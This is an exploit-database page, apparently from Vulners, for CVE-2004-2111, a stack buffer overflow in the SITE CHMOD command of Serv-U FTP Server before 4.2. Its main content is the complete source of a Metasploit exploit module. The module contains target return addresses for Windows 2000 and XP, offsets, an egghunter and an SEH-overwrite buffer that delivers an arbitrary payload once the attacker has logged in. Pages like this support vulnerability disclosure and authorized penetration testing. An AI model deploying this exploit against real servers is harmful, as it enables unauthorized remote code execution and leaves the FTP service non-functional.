Lucene search
K

Serv-U FTP Server < 4.2 Buffer Overflow

🗓️ 02 Dec 2011 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 31 Views

Serv-U FTP Server <4.2 Buffer Overflow CVE-2004-2111. Stack buffer overflow in site chmod command. Requires valid credentials. Exploitation leaves service non-functional state

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Serv-U FTP Server < 4.2 SITE CHMOD Command Handling Overflow
20 Aug 200400:00
nessus
Tenable Nessus
Serv-U SITE CHMOD Command Multiple Vulnerabilities
2 Feb 200400:00
nessus
0day.today
Serv-U FTP Server <4.2 Buffer Overflow
2 Dec 201100:00
zdt
Circl
CVE-2004-2111
2 Dec 201100:00
circl
Check Point Advisories
Serv-U FTP Server Command Buffer Overflow (CVE-2004-2111)
5 Nov 200900:00
checkpoint_advisories
CVE
CVE-2004-2111
27 May 200504:00
cve
Cvelist
CVE-2004-2111
27 May 200504:00
cvelist
Exploit DB
RhinoSoft Serv-U FTPd Server &lt; 4.2 - Remote Buffer Overflow (Metasploit)
2 Dec 201100:00
exploitdb
Metasploit
Serv-U FTP Server Buffer Overflow
30 Nov 201101:34
metasploit
NVD
CVE-2004-2111
31 Dec 200405:00
nvd
Rows per page

                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Serv-U FTP Server &lt;4.2 Buffer Overflow(CVE-2004-2111)',
      'Description'    =&gt; %q{
        This module exploits a stack buffer overflow in the site chmod command
        in versions of Serv-U FTP Server prior to 4.2.

        You must have valid credentials to trigger this vulnerability. Exploitation
        also leaves the service in a non-functional state.
      },
      'Author'         =&gt; 'thelightcosine &lt;thelightcosine[at]metasploit.com&gt;',
      'License'        =&gt; MSF_LICENSE,
      'Version'        =&gt; '$Revision$',
      'References'     =&gt;
        [
          [ 'CVE', '2004-2111'],
          [ 'BID', '9483'],
        ],
      'Privileged'     =&gt; true,
      'DefaultOptions' =&gt;
        {
          'EXITFUNC' =&gt; 'thread',
        },
      'Payload'        =&gt;
        {
          'BadChars'    =&gt; &quot;\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e&quot;,
          'DisableNops' =&gt; true,
        },
      'Platform'       =&gt; 'win',
      'Targets'        =&gt;
        [
          [ 'Windows 2000 SP0-4 EN', {
            'Ret'    =&gt; 0x750212bc, #WS2HELP.DLL
            'Offset' =&gt; 396 } ],
          [ 'Windows XP SP0-1 EN', {
            'Ret'    =&gt; 0x71aa388f, #WS2HELP.DLL
            'Offset' =&gt; 394 } ]
        ],
      'DisclosureDate' =&gt; 'Dec 31 2004',
      'DefaultTarget'  =&gt; 0))
  end

  def check
    connect
    disconnect

    if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
      return Exploit::CheckCode::Vulnerable
    end
      return Exploit::CheckCode::Safe
  end


  def exploit
    connect_login

    eggoptions =
    {
      :checksum =&gt; true,
      :eggtag =&gt; &quot;W00T&quot;
    }

    hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)


    buffer = &quot;chmod 777 &quot;
    buffer &lt;&lt;  make_nops(target['Offset'] - egg.length - hunter.length)
    buffer &lt;&lt; egg
    buffer &lt;&lt; hunter
    buffer &lt;&lt; &quot;\xeb\xc9\x41\x41&quot;  #nseh, jump back to egghunter
    buffer &lt;&lt; [target.ret].pack('V')  #seh
    buffer &lt;&lt; rand_text(5000)

    print_status(&quot;Trying target #{target.name}...&quot;)

    send_cmd( ['SITE', buffer] , false)

    handler
    disconnect
  end

end
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Dec 2011 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.86867
31